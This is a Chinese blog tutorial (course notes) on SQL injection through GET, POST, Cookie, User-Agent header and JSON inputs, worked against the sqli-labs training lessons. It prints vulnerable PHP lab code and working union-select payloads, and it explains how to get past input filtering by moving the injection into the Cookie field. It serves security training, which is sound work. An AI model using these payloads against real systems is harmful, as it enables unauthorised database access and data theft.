《小迪安全》第14天 SQL注入:注入类型及提交注入

已于 2023-04-26 14:25:28 修改
阅读量277 收藏 3
点赞数 2
文章标签: 安全 网络安全 web安全 sql
于 2023-04-26 14:22:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56250796/article/details/130271357
版权

目录

注入前需要明确

数据库类型

请求方法

数据类型

演示案例

参数字符型注入测试:sqlilabs less 5 6

POST数据提交注入测试:sqlilabs less 11

COOKIE数据提交注入测试:sqlilabs less 20

HTTP头部参数数据注入测试:sglilabs less 18

 参数JSON数据注入测试:本地环境代码演示

注入前需要明确

数据库类型

  • access
  • mssql
  • mysql
  • oracle
  • postsql
  • sqlite
  • mongodb

请求方法

不同的请求方法,请求的数据类型、大小都不一样。如果不按照网站接受的方式请求,注入语句将不被接受,无法代入数据库执行,注入无法攻击成功。

  • GET:特性:只要在网址后面,就能接收到
  • POST:通过网址无法接收,必须附在数据包末尾访问
<?php

$get=$_GET['g'];
echo $get;

$post=$_POST['p'];
echo $post;

?>

访问 127.0.0.1:8080/9.php?g=123
显示 123 抓包发现数据包以GET提交
访问 127.0.0.1:8080/9.php?g=123&p=456
显示 123 因为通过网址无法接收post变量

Firefox Hackbar选择以post data形式
访问 127.0.0.1:8080/9.php?g=123
     post data:p=456
显示 123456
抓数据包头 POST /9.php?g=123 HTTP/1.1
GET特性:只要在网址后面就能接收到参数

  • COOKIE:数据包字段
<?php

$c=$_COOKIE['c'];
echo $c;

?>
POST /9.php?g=123 HTTP/1.1
Host: 127.0.0.1:8080 
User-Agent: Mozilla/5.0 (Vindows NT 10.0: VOW64: rv:48.0) Gecko/20100101 Firefox/48,0
Accept: text/html,application/xhtml+xml,application/xml;g=0.9,*/*;g=0.8
Accept-Language: zh-CN, zh;g=0.8,en-US;q=0.5,en;g=0.3
Accept-Encoding: gzip, deflate
DNT:1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
Cookie: c=789

p=456
  • Request:全部接收,GET/POST/Cookie都能接收
<?php

$r=$_REQUEST['r'];
echo $r;

?>
  • HTTP头
<?php

$s=$_SERVER['HTTP_USER_AGENT'];
echo $s;

?>

数据类型

判断注入时是否需要考虑符号(' ")问题。

  • 数字型:select * from user where id=1
  • 字符型:select * from user where email_id='12345@678.com'
$name=$_GET['x'];
$sql="select * from user where name='$name'";

?x=xiaodi and 1=1        //注入语句
select * from user where name='xiaodi and 1=1'    //纯字符串无逻辑判断
  • 搜索型
  • JSON

SQL干扰符号: ',",s,),} 等,具体问题具体分析,通过尝试得知(某些工具也有内置字典)

演示案例

参数字符型注入测试:sqlilabs less 5 6

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

$id 被单引号扩起来了。注入的时候加一个单引号尝试绕过。

访问:127.0.0.1/Less-5/?id=1' and 1=1

报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

$sql="SELECT * FROM users WHERE id='1' and 1=1' LIMIT 0,1";

访问:127.0.0.1/Less-5/?id=1' and '1'='1

$sql="SELECT * FROM users WHERE id='1' and '1'='1' LIMIT 0,1";

页面正常。

访问:127.0.0.1/Less-5/?id=1' and '1'='2

$sql="SELECT * FROM users WHERE id='1' and '1'='2' LIMIT 0,1";

页面不正常。证实注入点。

开始测试注入。

访问:127.0.0.1/Less-5/?id=1' union select 1,2,3 and '1'='1

$sql="SELECT * FROM users WHERE id='1' union select 1,2,3 and '1'='1' LIMIT 0,1";

没有回显,无法联合注入,因为联合注入需要页面有回显位。要用报错/盲注进行测试。

如果没有回显,首先想到的就是程序已经禁止了数据库信息的返回显示。这是我们就要尝试进行盲注,可以尝试布尔型盲注、报错注入、时间延迟型盲注。这类型手工注入工程量很大,建议使用sqlmap,利用工具进行注入。

sqlmap扫描、burpsuite爆破猜解数据库名(security)……都是可行的。

Less-6

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

查看源码可以发现id参数在传递时被引号扩起来了。

输入单引号不报错,双引号时报错,根据报错信息可以推断是字符型注入,闭合方式为”。

注入时要明确参数类型、保证参数前后符号闭合,且后续的干扰项(如LIMIT 0,1)被注释掉(--+)。

POST数据提交注入测试:sqlilabs less 11

随便输入admin admin,BurpSuite开启抓包,查看数据包: 

登陆验证时需要与数据库发生交互,比对,post注入就发生在数据包最后一行。

密码一般是字符串,肯定要考虑符号问题。

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

注入语句:uname=admin' and 1=2 union select database(),2#

一共有两个通道(参数)即username,passwd。井号注释掉后续语句。

union select database() 查看当前数据库。回显:security。

然后继续常规操作猜解表名、列名、数据。

COOKIE数据提交注入测试:sqlilabs less 20

if(!isset($_COOKIE['uname']))
...
if(isset($_POST['uname']) && isset($_POST['passwd']))
		{
	
		$uname = check_input($_POST['uname']);
		$passwd = check_input($_POST['passwd']);
		
		$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
		$result1 = mysql_query($sql);
		$row1 = mysql_fetch_array($result1);
		$cookee = $row1['username'];

Cookie注入:以cookie方式提交注入点。

修改 index.php 使其回显sql语句,尝试登陆xiaodi xiaodi,页面回显sql语句:

SELECT users.username,users.password FROM users WHERE users.username='xiaodi' and users.password='xiaodi' ORDER BY users.id DESC LIMIT 0,1

随便输入,尝试登陆,抓包,POST数据包Payload显示:

uname=admin&passwd=admin&submit=Submit

尝试注入 uname=xiaodi' and 1=2 union select 1,2,3#

发现 xiaodi 后的单引号被转义了(uname=‘xiaodi\')并且语句到union就被截断。

从源代码获悉开启了魔术引号 get_magic_quotes_gpc(),对所有以POST形式传入的参数进行检测 check_input():

function check_input($value)
	{
	if(!empty($value))
		{
		$value = substr($value,0,20); // truncation (see comments)
		}
		if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
			{
			$value = stripslashes($value);
			}
		if (!ctype_digit($value))   	// Quote if not a number
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
	else
		{
		$value = intval($value);
		}
	return $value;
	}


if(isset($_POST['uname']) && isset($_POST['passwd']))
		{
	
		$uname = check_input($_POST['uname']);
		$passwd = check_input($_POST['passwd']);
if(!isset($_COOKIE['uname']))
	{
	//including the Mysql connect parameters.
	include("../sql-connections/sql-connect.php");

提供思路:如果POST走不通,可以尝试Cookie注入。

点击登陆时POST数据包的Payload是:uname=admin&passwd=admin&submit=Submit

代码审计发现,如果没有submit则默认为Cookie形式。所以只需在POST数据包内删除Payload字段内的 submit= 并在数据包Headers添加Cookie字段(并附注入语句)即可。

if(!isset($_POST['submit']))
		{
			
			$cookee = $_COOKIE['uname'];
			$format = 'D d M Y - H:i:s';
			$timestamp = time() + 3600;
			echo "<center>";
			echo '<br><br><br>';
			echo '<img src="../images/Less-20.jpg" />';
			echo "<br><br><b>";
			echo '<br><font color= "red" font size="4">';	
			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
			echo "</font><br>";	
			echo '<font color= "cyan" font size="4">';	
			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];			
			echo "</font><br>";			
			echo '<font color= "#FFFF00" font size = 4 >';
			echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
			echo '<font color= "orange" font size = 5 >';			
			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
			
			
			echo "<br></font>";
			$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
			$result=mysql_query($sql);

修改数据包,添加Cookie字段:

Cookie: uname=admin' and 1=2 union select 1,2,3#

发现页面回显。

Cookie: uname=admin' and 1=2 union select database(),2,3#

继续常规操作即可。

1、如何Cookie注入(数据包加字段

2、当过滤机制仅针对POST提交的参数时,Cookie可以绕过过滤机制。

Cookie注入是因为从源代码中看到到Cookie没有设置过滤,所以用Cookie注入,在实际情况中,可以通过网站指纹意外源码审计,没有源码的情况下可以先试试GET注入、POST注入,然后再试Cookie。(所以说,手工盲注是一个工作量略大的活……)

HTTP头部参数数据注入测试:sglilabs less 18

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
	
function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,20);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
	else
		{
		$value = intval($value);
		}
	return $value;
	}

	$uagent = $_SERVER['HTTP_USER_AGENT'];
	$IP = $_SERVER['REMOTE_ADDR'];
	echo "<br>";
	echo 'Your IP ADDRESS is: ' .$IP;
	echo "<br>";
	//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

	{
	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);
	
	/*
	echo 'Your Your User name:'. $uname;
	echo "<br>";
	echo 'Your Password:'. $passwd;
	echo "<br>";
	echo 'Your User Agent String:'. $uagent;
	echo "<br>";
	echo 'Your User Agent String:'. $IP;
	*/

	//logging the connection parameters to a file for analysis.	
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Agent:'.$uname."\n");
	
	fclose($fp);
	
	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)
			{
			echo '<font color= "#FFFF00" font size = 3 >';
			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color= "#0000ff" font size = 3 >';			
			echo 'Your User Agent is: ' .$uagent;
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());			
			echo "<br><br>";
			echo '<img src="../images/flag.jpg"  />';
			echo "<br>";
			
			}
		else
			{
			echo '<font color= "#0000ff" font size="3">';
			//echo "Try again looser";
			print_r(mysql_error());
			echo "</br>";			
			echo "</br>";
			echo '<img src="../images/slap.jpg"   />';	
			echo "</font>";  
			}
	}
?>

源码:仍有过滤函数 check_input() ,并使用了$_SERVER['']内置函数获取IP和uagnet。

过滤函数并没有对 $uagent = $_SERVER['HTTP_USER_AGENT']; $IP = $_SERVER['REMOTE_ADDR']; 做过滤,并且源码可以看到有sql语句代入这两个未经过滤的参数执行了查询:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);

本关卡属于INSERT注入(先前都是SELECT注入)。

修改源码使其回显:echo $insert();

需要成功登陆才能触发INSERT。尝试登陆 admin admin,抓包:

看到执行了语句:

INSERT INTO 'security'.'uagents' ('uagent','ip_address','username') VALUES ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36','172.17.0.1','admin')
mysql> use security;
Database changed

mysql> show tables;
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| referers           |
| uagents            |
| users              |
+--------------------+
4 rows in set (0.00 sec)

mysql> select * from uagents;
+----+-----------------------------------------------------------------------------------------------------------------------+------------+----------+
| id | uagent                                                                                                                | ip_address | username |
+----+-----------------------------------------------------------------------------------------------------------------------+------------+----------+
|  1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 | 172.17.0.1 | admin    |
+----+-----------------------------------------------------------------------------------------------------------------------+------------+----------+
1 row in set (0.01 sec)

注入语句就在 User-Agent 字段做文章……

修改数据包的 User-Agent 字段为 aaaa,执行的sql语句就是:

INSERT INTO 'security'.'uagents' ('uagent','ip_address','username') VALUES ('aaaa','172.17.0.1','admin')

 参数JSON数据注入测试:本地环境代码演示

JSON:全称是 JavaScript Object Notation,即 JavaScript对象标记法。

JSON是一种轻量级(Light-Meight)、基于文本的(Text-Based)、可读的(Human-Readable)格式。JSON无论对于人,还是对于机器来说,都十分便于阅读和书写,而且相比 XML文件更小,因此迅速成为网络上十分流行的交换格式,许多网站使用JSON格式进行数据交互。

JSON语法规则总结如下:

  • 数组(Array)用方括号(“[]”)表示。
  • 对象(0bject)用大括号(“{}”)表示。
  • 名称/值对(name/value)组合成数组和对象。
  • 名称(name)置于双引号中,值(value)有字符串、数值、布尔值、null、对象和数组。
  • 并列的数据之间用逗号(“,”)分隔

注入方式:如果是数字型可以不加( ' )闭合,如果是字符型需加( " )闭合

POST /json.php HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv;48.0) Gecko/20100101Firefox/48.0
Accept; text/html, application/xhtml+xml, application/xml;g=0.g, */*;g=D.8
Accept-Language; zh-CN, zh;q=0.8,en-Us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

json={"username"; "Dumb' and 1=2 union select 1,database(),3#"}

滴滴滴哒滴滴逗逗
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
小迪安全14-SQL注入类型提交注入
hackerXxxt的博客
03-10 108
Cookie:uname=admin' and 1=1 union select database(),2,3#--爆库。其中SQI语句干扰符号: ', ", %, ), } 等,具体需看写法 '"]})可以作为默认测试写法。通过源代码发现,对于提交内容,有长度限制和魔术引号过滤,这时候可以考虑cookie注入,绕过防护。GET, POST, COOKIE, REQUEST, HTTP头等。#考虑单引号,双引号闭合问题--sqli5,6。id=1' and '1'='2--报错。(request全部接受)
小迪安全14 PHP 开发-个人博客项目&输入输出类&留言板&访问 IP&UA 头&来源
weixin_73760178的博客
01-04 396
这时发现我们每刷新一下,都会进行一次弹窗,原因很简单,就是每次刷新页面,都会对之前的页面进行访问,然后我们之前的写入的数据已经都被数据库所写入,所以每次刷新页面之前的数据都会重新显示,那么有js的信息将被执行——存储型XSS。首先需个人进行搭建一个个人输入输出的网页,这里我们使用一个搜索连接数据库的网页。管理网站:检测来源,过滤了攻击——从而可以伪造管理员的相关数据,进行伪造访问。使用js代码,发现进行执行了,因为当我们在搜索框中输入任意的字符,已知攻击者知道的某个管理员的习惯,喜欢看涩涩;
小迪安全day14WEB漏洞——SQL注入类型提交注入
RichUee的博客
12-06 570
在真实 SQL 注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型提交方法可以通过抓包分析获取,后续安全测试中我们也必须满足同等的操作才能进行注入
B站小迪安全笔记第十四-SQL注入类型提交注入
m0_61530426的博客
07-29 440
B站小迪安全笔记
sql注入类型和简单的代码原理(3)
weirdo_d的博客
10-18 1889
SQL 注入其他情况 0x00 二次注入 注册用户 admin'# 123 写入数据库 <?php $username = $_GET['username'] $password = $_GET['password'] $result = mysqli_query($con ,) $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=
14WEB漏洞-SQL注入类型提交注入1
08-03
网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入类型及其提交方式,以及如何进行安全测试。 首先,...
第十三节 SQL注入绕过技术-01
09-15
本节课程将详细介绍 SQL 注入绕过技术的四种方法:大小写绕过、双写绕过、编码绕过和内联注释绕过。 大小写绕过 大小写绕过是最简单的 SQL 注入绕过方法之一。当程序中设置了过滤关键字时,如果过滤过程中没有对...
zzzphp1.7.4&1.7.5到处都是sql注入.pdf
04-09
【zzzphp 1.7.4&1.7.5 SQL注入详解】 在本文中,我们将探讨针对zzzphp内容管理系统(CMS)1.7.4和1.7.5版本中存在的多处SQL注入漏洞。这些漏洞存在于系统的前后台,使得攻击者有可能通过精心构造的SQL语句对数据库...
SQL注入手动盲注案例
最新发布
05-30
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序的输入字段中插入恶意SQL语句来操纵或窃取数据库中的信息。手动盲注是一种高级技巧,适用于无法直接观察到SQL查询结果的情况下进行。 #### 二、...
sql注入
11-07
从上面的例子我们可以知道,SQL注入的原理,就是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取你想到得到的资料。 第二节、判断能否进行SQL注入 看完第一节,有一些人会觉得:我也是经常这样测试...
sqli2 第17关
m0_69349614的博客
07-09 357
我们先按照这个网页的功能走一遍,目测是更改密码的页面,输入用户名之后用新密码覆盖旧密码。 切换到 Less 11 验证一下,可以看到此时 admin 用户的密码已经被我们所修改。 接下来判断注入类型,使用单引号闭合构造恒真条件,网页回显密码修改失败。 Copy Highlighter-hljs 测试一下所有的注入,发现这些注入网页都回显改密失败。 Copy Highlighter-hljs 抓包得知网页需要利用 POST 方法提交的参数格式如下: Copy Highlighter-hljs
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2962
使用sqlmap进行post注入学习笔记
Oracle&Postgresql注入
tell_me_404的博客
02-27 568
一、Oracle注入详解: 与Oracle数据库搭配: 脚本语言asp,aspx,jsp web服务器:tomcat 测试站点:http://www.e-hifarms.com/yellowpage/detail.jsp?id=111 1、判断注入 略 2、判断oracle数据库: id=1 and exists(select * from dual) id=1 and exist...
Web漏洞-access注入Sql Sever(Mssql注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1817
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
第8篇:Oracle注入漏洞绕waf的新语句
ABC_123的博客
05-02 698
Part1 前言大家好,上期分享了一次MS12-020蓝屏漏洞的巧用。这篇文章源于之前做的一个银行红队项目,遇到到了一个Oracle数据库的SQL注入漏洞,但是网上能搜索到的各种SQL语句都没法出数据,所以客户不认可这个漏洞的危害性,于是就开始了对这个Oracle的SQL注入绕WAF的探索过程:Part2 研究过程SQL注入判断过程经过对Web应用一系列的手工漏洞.........
Oracle学习总结(6)—— SQL注入技术
weixin_34194551的博客
09-23 273
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规...
PHP代码审计4—Sql注入漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-18 1973
SQL注入代码审计入门
web漏洞“小迪安全课堂笔记”XXE&XML
weixin_42902126的博客
03-29 4115
小迪安全课堂笔记XXE&XML思维导图XML XXEXML 与 HTML 的主要差异pikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入xxe-lab 靶场登陆框 xml 数据传输测试-检测发现 思维导图 XML XXE XML 被设计为传输和存储数据,XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从 HTML 分离,是独立于软件和硬件的信息传输工具。XXE 漏洞全称XML External Entity Injection,
小迪WEB
热门推荐
weixin_52125240的博客
09-26 2万+
WEB-学习小迪安全第01:基础入门—概念名词域名 小迪安全 第01:基础入门—概念名词 域名 1)什么是域名? 域名,是由一串用点分割的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时计算机的电子方位; 例如:www.bilibili.com 2)域名在哪里注册? 在第三方平台上注册,国内的一些域名注册商,比如阿里云旗下的万网。 3)什么是二级域名多级域名? 二级域名:顶级域名之下的域名。 例如: www.baidu.com为主域,则图中news.baidu.com为二级域
掌握WEB漏洞:SQL注入类型与实战测试
在第14Web漏洞学习中,我们将深入探讨SQL注入攻击的几种常见类型以及如何在实际测试环境中检测和利用这些漏洞。首先,了解参数类型至关重要,因为SQL注入通常涉及输入的数据类型,如数字、字符、搜索查询和JSON...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值